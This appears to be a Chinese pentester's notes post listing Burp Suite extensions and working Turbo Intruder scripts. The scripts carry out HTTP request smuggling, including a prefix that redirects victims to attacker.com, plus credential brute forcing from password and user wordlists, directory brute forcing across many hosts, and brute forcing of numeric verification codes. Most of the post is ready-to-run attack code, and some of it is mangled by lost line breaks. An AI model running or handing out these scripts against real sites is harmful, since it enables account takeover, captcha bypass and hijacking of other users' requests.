zoukankan      html  css  js  c++  java
  • burp

    burp 2020.7版本汉化及矫正鼠标聚焦

    https://mp.weixin.qq.com/s/eO4bMaDrUrNoRttcykMfpA  

    IP代理切换

    https://github.com/RhinoSecurityLabs/IPRotate_Burp_Extension

    https://github.com/AeolusTF/BurpFakeIP

    User-Agents代理切换

    https://github.com/m4ll0k/BurpSuite-Random_UserAgent

    高亮标记

    https://github.com/nian-hua/BurpExtender

    Turbo-Intruder

    请求走私
    (1)证明

    # if you edit this file, ensure you keep the line endings as CRLF or you'll have a bad time
    def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
    concurrentConnections=5,
    requestsPerConnection=1,
    resumeSSL=False,
    timeout=10,
    pipeline=False,
    maxRetriesPerRequest=0
    )
    engine.start()

    # This will prefix the victim's request. Edit it to achieve the desired effect.
    prefix = '''GET /sso/request HTTP/1.1
    X-Ignore: X'''

    # The request engine will auto-fix the content-length for us
    attack = target.req + prefix
    engine.queue(attack)

    victim = target.req
    for i in range(14):
    engine.queue(victim)
    time.sleep(0.05)


    def handleResponse(req, interesting):
    table.add(req)

    (2)重定向

    # if you edit this file, ensure you keep the line endings as CRLF or you'll have a bad time
    def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
    concurrentConnections=5,
    requestsPerConnection=1,
    resumeSSL=False,
    timeout=10,
    pipeline=False,
    maxRetriesPerRequest=0
    )
    engine.start()

    # This will prefix the victim's request. Edit it to achieve the desired effect.
    prefix = '''GET / HTTP/1.1
    Host: www.attacker.com
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 20

    x=10
    '''

    # The request engine will auto-fix the content-length for us
    attack = target.req + prefix
    engine.queue(attack)

    victim = target.req
    for i in range(14):
    engine.queue(victim)
    time.sleep(0.05)


    def handleResponse(req, interesting):
    table.add(req)

    账号密码爆破

    from urllib import quote

    def password_brute(target,engine):
      for word in open('/Users/mac/safe/web/brute/mypass.txt'):
        engine.queue(target.req, quote(word.rstrip()))

    def user_brute(target,engine):
      for word in open('/Users/mac/safe/web/brute/myuser.txt'):
        engine.queue(target.req, quote(word.rstrip()))

    def user_password_brute(target,engine):
      for password in open('D:/res.txt'):
        for user in open('D:/user.txt'):
          engine.queue(target.req, [quote(user.rstrip()),quote(password.rstrip())])

    def queueRequests(target, wordlists):
      engine = RequestEngine(endpoint=target.endpoint,
      concurrentConnections=30,
      requestsPerConnection=100,
      pipeline=False
    )
    #user_brute(target,engine)
    #password_brute(target,engine)
    user_password_brute(target,engine)

    def handleResponse(req, interesting):
    # currently available attributes are req.status, req.wordcount, req.length and req.response
      if 'false' not in req.response:
        table.add(req)



    多路径爆破

    def mult_host_dir_brute():
      req = '''GET /%s HTTP/1.1Host: %sConnection: keep-alive''' 
      engines = {}for url in open('urls.txt'):        
      url = url.rstrip()

      engine = RequestEngine(endpoint=url,

      concurrentConnections=5,

      requestsPerConnection=100,

      pipeline=True)

      engines[url] = engine

      
    for word in open('D:/Fuzz_dic-master/Fuzz_dic/dirsearch.txt'):
      word = word.rstrip()for (url, engine) in engines.items():            
      domain = url.split('/')[2]

      engine.queue(req, [word, domain])


    def queueRequests(target, wordlists):

      mult_host_dir_brute()


    def handleResponse(req, interesting):
    # currently available attributes are req.status, req.wordcount, req.length and req.response
      if req.status != 404:

        table.add(req)

    单路径爆破
    # Find more example scripts at https://github.com/PortSwigger/turbo-intruder/blob/master/resources/examples/default.py def queueRequests(target, wordlists): engine = RequestEngine(endpoint=target.endpoint, concurrentConnections=5, requestsPerConnection=100, pipeline=True ) for i in range(3, 8): engine.queue(target.req, randstr(i), learn=1) engine.queue(target.req, target.baseInput, learn=2) for word in open('D:/Fuzz_dic-master/Fuzz_dic/dirsearch.txt'): engine.queue(target.req, word.rstrip()) def handleResponse(req, interesting): if interesting: table.add(req)

    验证码爆破

    from itertools import product def brute_veify_code(target, engine, length): pattern = '1234567890' for i in list(product(pattern, repeat=length)): code = ''.join(i) engine.queue(target.req, code) def queueRequests(target, wordlists): engine = RequestEngine(endpoint=target.endpoint, concurrentConnections=30, requestsPerConnection=100, pipeline=True ) brute_veify_code(target, engine, 4|6(位数可自定义)) def handleResponse(req, interesting): # currently available attributes are req.status, req.wordcount, req.length and req.response if 'error' not in req.response: #(根据情况适当调整) table.add(req)
  • 相关阅读:
    js:通过正则匹配获取页面的url中的参数
    BZOJ 4873 寿司餐厅 网络流
    BZOJ 3308 毒瘤结论 网络流
    BZOJ3451 CDOJ1562点分治+FFT
    P3731 二分图匹配必经边
    Hdu 6268 点分治 树上背包 bitset 优化
    Hdu 1517 巴什博奕变形
    dsu on tree
    CF #546 D.E
    HNOI 世界树 虚树
  • 原文地址:https://www.cnblogs.com/AtesetEnginner/p/11307628.html
Copyright © 2011-2022 走看看